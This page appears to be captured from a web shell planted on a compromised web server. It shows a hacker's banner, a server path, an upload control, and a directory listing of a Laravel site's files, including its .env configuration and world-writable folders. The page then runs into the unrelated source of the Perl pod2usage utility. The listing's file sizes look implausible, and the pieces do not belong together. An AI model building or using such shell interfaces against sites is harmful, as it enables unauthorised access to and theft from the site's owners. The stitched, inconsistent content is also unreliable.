I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
#!/usr/bin/perl eval 'exec perl -S $0 "$@"' if 0; ############################################################################# # pod2usage -- command to print usage messages from embedded pod docs # # Copyright (c) 1996-2000 by Bradford Appleton. All rights reserved. # Copyright (c) 2001-2016 by Marek Rouchal. # This file is part of "Pod-Usage". Pod-Usage is free software; # you can redistribute it and/or modify it under the same terms # as Perl itself. ############################################################################# use strict; #use diagnostics; =head1 NAME pod2usage - print usage messages from embedded pod docs in files =head1 SYNOPSIS =over 12 =item B [B<-help>] [B<-man>] [B<-exit>S< >I] [B<-output>S< >I] [B<-verbose> I] [B<-pathlist> I] [B<-formatter> I] [B<-utf8>] I =back =head1 OPTIONS AND ARGUMENTS =over 8 =item B<-help> Print a brief help message and exit. =item B<-man> Print this command's manual page and exit. =item B<-exit> I The exit status value to return. =item B<-output> I The output file to print to. If the special names "-" or ">&1" or ">&STDOUT" are used then standard output is used. If ">&2" or ">&STDERR" is used then standard error is used. =item B<-verbose> I The desired level of verbosity to use: 1 : print SYNOPSIS only 2 : print SYNOPSIS sections and any OPTIONS/ARGUMENTS sections 3 : print the entire manpage (similar to running pod2text) =item B<-pathlist> I Specifies one or more directories to search for the input file if it was not supplied with an absolute path. Each directory path in the given list should be separated by a ':' on Unix (';' on MSWin32 and DOS). =item B<-formatter> I Which text formatter to use. Default is L, or for very old Perl versions L. An alternative would be e.g. L. =item B<-utf8> This option assumes that the formatter (see above) understands the option "utf8". It turns on generation of utf8 output. =item I The pathname of a file containing pod documentation to be output in usage message format (defaults to standard input). =back =head1 DESCRIPTION B will read the given input file looking for pod documentation and will print the corresponding usage message. If no input file is specified then standard input is read. B invokes the B function in the B module. Please see L. =head1 SEE ALSO L, L =head1 AUTHOR Please report bugs using L. Brad Appleton Ebradapp@enteract.comE Based on code for B written by Tom Christiansen Etchrist@mox.perl.comE =cut use Getopt::Long; ## Define options my %options = (); my @opt_specs = ( 'help', 'man', 'exit=i', 'output=s', 'pathlist=s', 'formatter=s', 'verbose=i', 'utf8!' ); ## Parse options GetOptions(\%options, @opt_specs) || pod2usage(2); $Pod::Usage::Formatter = $options{formatter} if $options{formatter}; require Pod::Usage; Pod::Usage->import(); pod2usage(1) if ($options{help}); pod2usage(VERBOSE => 2) if ($options{man}); ## Dont default to STDIN if connected to a terminal pod2usage(2) if ((@ARGV == 0) && (-t STDIN)); @ARGV = ('-') unless (@ARGV); if (@ARGV > 1) { print STDERR "pod2usage: Too many filenames given\n\n"; pod2usage(2); } my %usage = (); $usage{-input} = shift(@ARGV); $usage{-exitval} = $options{'exit'} if (defined $options{'exit'}); $usage{-output} = $options{'output'} if (defined $options{'output'}); $usage{-verbose} = $options{'verbose'} if (defined $options{'verbose'}); $usage{-pathlist} = $options{'pathlist'} if (defined $options{'pathlist'}); $usage{-utf8} = $options{'utf8'} if (defined $options{'utf8'}); pod2usage(\%usage);